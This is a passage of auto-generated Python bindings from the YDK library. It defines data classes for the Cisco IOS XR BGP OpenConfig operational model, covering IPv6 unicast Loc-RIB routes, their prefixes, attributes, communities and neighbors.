('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('valid_route', (YLeaf(YType.boolean, 'valid-route'), ['bool'])),
('invalid_reason', (YLeaf(YType.enumeration, 'invalid-reason'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcInvalidRouteReason', '')])),
('best_path', (YLeaf(YType.boolean, 'best-path'), ['bool'])),
])
self.route = None
self.neighbor_address = None
self.path_id = None
self.valid_route = None
self.invalid_reason = None
self.best_path = None
self.prefix_name = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName()
self.prefix_name.parent = self
self._children_name_map["prefix_name"] = "prefix-name"
self.route_attr_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList()
self.route_attr_list.parent = self
self._children_name_map["route_attr_list"] = "route-attr-list"
self.ext_attributes_list = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList()
self.ext_attributes_list.parent = self
self._children_name_map["ext_attributes_list"] = "ext-attributes-list"
self.last_modified_date = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate()
self.last_modified_date.parent = self
self._children_name_map["last_modified_date"] = "last-modified-date"
self.last_update_recieved = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved()
self.last_update_recieved.parent = self
self._children_name_map["last_update_recieved"] = "last-update-recieved"
self._segment_path = lambda: "route"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route, ['route', 'neighbor_address', 'path_id', 'valid_route', 'invalid_reason', 'best_path'], name, value)
class PrefixName(_Entity_):
"""
Prefix
.. attribute:: prefix
Prefix
**type**\: :py:class:`Prefix <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix>`
**config**\: False
.. attribute:: prefix_length
Prefix length
**type**\: int
**range:** 0..255
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName, self).__init__()
self.yang_name = "prefix-name"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("prefix", ("prefix", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix))])
self._leafs = OrderedDict([
('prefix_length', (YLeaf(YType.uint8, 'prefix-length'), ['int'])),
])
self.prefix_length = None
self.prefix = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix()
self.prefix.parent = self
self._children_name_map["prefix"] = "prefix"
self._segment_path = lambda: "prefix-name"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName, ['prefix_length'], name, value)
class Prefix(_Entity_):
"""
Prefix
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix, self).__init__()
self.yang_name = "prefix"
self.yang_parent_name = "prefix-name"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "prefix"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/prefix-name/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName.Prefix']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.PrefixName']['meta_info']
class RouteAttrList(_Entity_):
"""
RouteAttributesList
.. attribute:: next_hop
NextHopAddress
**type**\: :py:class:`NextHop <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop>`
**config**\: False
.. attribute:: aggregrator_attributes
AggregatorList
**type**\: :py:class:`AggregratorAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes>`
**config**\: False
.. attribute:: origin_type
Origin Attribute Type
**type**\: :py:class:`BgpOcOriginAttr <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcOriginAttr>`
**config**\: False
.. attribute:: as_path
AS Path
**type**\: str
**config**\: False
.. attribute:: as4_path
AS4 Path
**type**\: str
**config**\: False
.. attribute:: med
Med
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: local_pref
LocalPref
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: atomic_aggr
AtomicAggr
**type**\: bool
**config**\: False
.. attribute:: community
CommunityArray
**type**\: list of :py:class:`Community <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList, self).__init__()
self.yang_name = "route-attr-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("next-hop", ("next_hop", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop)), ("aggregrator-attributes", ("aggregrator_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes)), ("community", ("community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community))])
self._leafs = OrderedDict([
('origin_type', (YLeaf(YType.enumeration, 'origin-type'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcOriginAttr', '')])),
('as_path', (YLeaf(YType.str, 'as-path'), ['str'])),
('as4_path', (YLeaf(YType.str, 'as4-path'), ['str'])),
('med', (YLeaf(YType.uint32, 'med'), ['int'])),
('local_pref', (YLeaf(YType.uint32, 'local-pref'), ['int'])),
('atomic_aggr', (YLeaf(YType.boolean, 'atomic-aggr'), ['bool'])),
])
self.origin_type = None
self.as_path = None
self.as4_path = None
self.med = None
self.local_pref = None
self.atomic_aggr = None
self.next_hop = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop()
self.next_hop.parent = self
self._children_name_map["next_hop"] = "next-hop"
self.aggregrator_attributes = OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes()
self.aggregrator_attributes.parent = self
self._children_name_map["aggregrator_attributes"] = "aggregrator-attributes"
self.community = YList(self)
self._segment_path = lambda: "route-attr-list"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList, ['origin_type', 'as_path', 'as4_path', 'med', 'local_pref', 'atomic_aggr'], name, value)
class NextHop(_Entity_):
"""
NextHopAddress
.. attribute:: afi
AFI
**type**\: :py:class:`BgpOcAfi <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.BgpOcAfi>`
**config**\: False
.. attribute:: ipv4_address
IPv4 Addr
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ipv6_address
IPv6 Addr
**type**\: str
**pattern:** ((\:\|[0\-9a\-fA\-F]{0,4})\:)([0\-9a\-fA\-F]{0,4}\:){0,5}((([0\-9a\-fA\-F]{0,4}\:)?(\:\|[0\-9a\-fA\-F]{0,4}))\|(((25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])\\.){3}(25[0\-5]\|2[0\-4][0\-9]\|[01]?[0\-9]?[0\-9])))(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, self).__init__()
self.yang_name = "next-hop"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('afi', (YLeaf(YType.enumeration, 'afi'), [('ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper', 'BgpOcAfi', '')])),
('ipv4_address', (YLeaf(YType.str, 'ipv4-address'), ['str'])),
('ipv6_address', (YLeaf(YType.str, 'ipv6-address'), ['str'])),
])
self.afi = None
self.ipv4_address = None
self.ipv6_address = None
self._segment_path = lambda: "next-hop"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop, ['afi', 'ipv4_address', 'ipv6_address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.NextHop']['meta_info']
class AggregratorAttributes(_Entity_):
"""
AggregatorList
.. attribute:: as_
AS number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: as4
AS4 number
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: address
IPv4 address
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, self).__init__()
self.yang_name = "aggregrator-attributes"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('as_', (YLeaf(YType.uint32, 'as'), ['int'])),
('as4', (YLeaf(YType.uint32, 'as4'), ['int'])),
('address', (YLeaf(YType.str, 'address'), ['str'])),
])
self.as_ = None
self.as4 = None
self.address = None
self._segment_path = lambda: "aggregrator-attributes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes, ['as_', 'as4', 'address'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.AggregratorAttributes']['meta_info']
class Community(_Entity_):
"""
CommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community, self).__init__()
self.yang_name = "community"
self.yang_parent_name = "route-attr-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "community"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/route-attr-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList.Community']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.RouteAttrList']['meta_info']
class ExtAttributesList(_Entity_):
"""
ExtAttributesList
.. attribute:: originator_id
OriginatorID
**type**\: str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: aigp
AIGP
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
.. attribute:: path_id
PathId
**type**\: int
**range:** 0..4294967295
**config**\: False
.. attribute:: cluster
ClusterList
**type**\: list of str
**pattern:** (([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])\\.){3}([0\-9]\|[1\-9][0\-9]\|1[0\-9][0\-9]\|2[0\-4][0\-9]\|25[0\-5])(%[\\p{N}\\p{L}]+)?
**config**\: False
.. attribute:: ext_community
ExtendedCommunityArray
**type**\: list of :py:class:`ExtCommunity <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity>`
**config**\: False
.. attribute:: unknown_attributes
UnknownAttributes
**type**\: list of :py:class:`UnknownAttributes <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList, self).__init__()
self.yang_name = "ext-attributes-list"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("ext-community", ("ext_community", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity)), ("unknown-attributes", ("unknown_attributes", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes))])
self._leafs = OrderedDict([
('originator_id', (YLeaf(YType.str, 'originator-id'), ['str'])),
('aigp', (YLeaf(YType.uint64, 'aigp'), ['int'])),
('path_id', (YLeaf(YType.uint32, 'path-id'), ['int'])),
('cluster', (YLeafList(YType.str, 'cluster'), ['str'])),
])
self.originator_id = None
self.aigp = None
self.path_id = None
self.cluster = []
self.ext_community = YList(self)
self.unknown_attributes = YList(self)
self._segment_path = lambda: "ext-attributes-list"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList, ['originator_id', 'aigp', 'path_id', 'cluster'], name, value)
class ExtCommunity(_Entity_):
"""
ExtendedCommunityArray
.. attribute:: objects
BGP OC objects
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, self).__init__()
self.yang_name = "ext-community"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('objects', (YLeaf(YType.str, 'objects'), ['str'])),
])
self.objects = None
self._segment_path = lambda: "ext-community"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity, ['objects'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.ExtCommunity']['meta_info']
class UnknownAttributes(_Entity_):
"""
UnknownAttributes
.. attribute:: attribute_type
AttributeType
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_length
AttributeLength
**type**\: int
**range:** 0..65535
**config**\: False
.. attribute:: attribute_value
Atributevalue
**type**\: str
**pattern:** ([0\-9a\-fA\-F]{2}(\:[0\-9a\-fA\-F]{2})\*)?
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, self).__init__()
self.yang_name = "unknown-attributes"
self.yang_parent_name = "ext-attributes-list"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('attribute_type', (YLeaf(YType.uint16, 'attribute-type'), ['int'])),
('attribute_length', (YLeaf(YType.uint16, 'attribute-length'), ['int'])),
('attribute_value', (YLeaf(YType.str, 'attribute-value'), ['str'])),
])
self.attribute_type = None
self.attribute_length = None
self.attribute_value = None
self._segment_path = lambda: "unknown-attributes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/ext-attributes-list/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes, ['attribute_type', 'attribute_length', 'attribute_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList.UnknownAttributes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.ExtAttributesList']['meta_info']
class LastModifiedDate(_Entity_):
"""
LastModifiedDate
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate, self).__init__()
self.yang_name = "last-modified-date"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-modified-date"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastModifiedDate']['meta_info']
class LastUpdateRecieved(_Entity_):
"""
LastUpdateRecieved
.. attribute:: time_value
TimeValue
**type**\: str
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved, self).__init__()
self.yang_name = "last-update-recieved"
self.yang_parent_name = "route"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('time_value', (YLeaf(YType.str, 'time-value'), ['str'])),
])
self.time_value = None
self._segment_path = lambda: "last-update-recieved"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/routes/route/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved, ['time_value'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route.LastUpdateRecieved']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes.Route']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.Routes']['meta_info']
class NumRoutes(_Entity_):
"""
Number of routes in adjacency rib out\-bound
post\-policy table
.. attribute:: num_routes
NumRoutes
**type**\: int
**range:** 0..18446744073709551615
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes, self).__init__()
self.yang_name = "num-routes"
self.yang_parent_name = "loc-rib"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([])
self._leafs = OrderedDict([
('num_routes', (YLeaf(YType.uint64, 'num-routes'), ['int'])),
])
self.num_routes = None
self._segment_path = lambda: "num-routes"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/loc-rib/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
self._perform_setattr(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes, ['num_routes'], name, value)
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib.NumRoutes']['meta_info']
@staticmethod
def _meta_info():
from ydk.models.cisco_ios_xr._meta import _Cisco_IOS_XR_ipv4_bgp_oc_oper as meta
return meta._meta_table['OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.LocRib']['meta_info']
class OpenConfigNeighbors(_Entity_):
"""
Neighbor list
.. attribute:: open_config_neighbor
Neighbor name
**type**\: list of :py:class:`OpenConfigNeighbor <ydk.models.cisco_ios_xr.Cisco_IOS_XR_ipv4_bgp_oc_oper.OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor>`
**config**\: False
"""
_prefix = 'ipv4-bgp-oc-oper'
_revision = '2017-09-07'
def __init__(self):
if sys.version_info > (3,):
super().__init__()
else:
super(OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors, self).__init__()
self.yang_name = "open-config-neighbors"
self.yang_parent_name = "ipv6-unicast"
self.is_top_level_class = False
self.has_list_ancestor = False
self.ylist_key_names = []
self._child_classes = OrderedDict([("open-config-neighbor", ("open_config_neighbor", OcBgp.BgpRib.AfiSafiTable.Ipv6Unicast.OpenConfigNeighbors.OpenConfigNeighbor))])
self._leafs = OrderedDict()
self.open_config_neighbor = YList(self)
self._segment_path = lambda: "open-config-neighbors"
self._absolute_path = lambda: "Cisco-IOS-XR-ipv4-bgp-oc-oper:oc-bgp/bgp-rib/afi-safi-table/ipv6-unicast/%s" % self._segment_path()
self._is_frozen = True
def __setattr__(self, name, value):
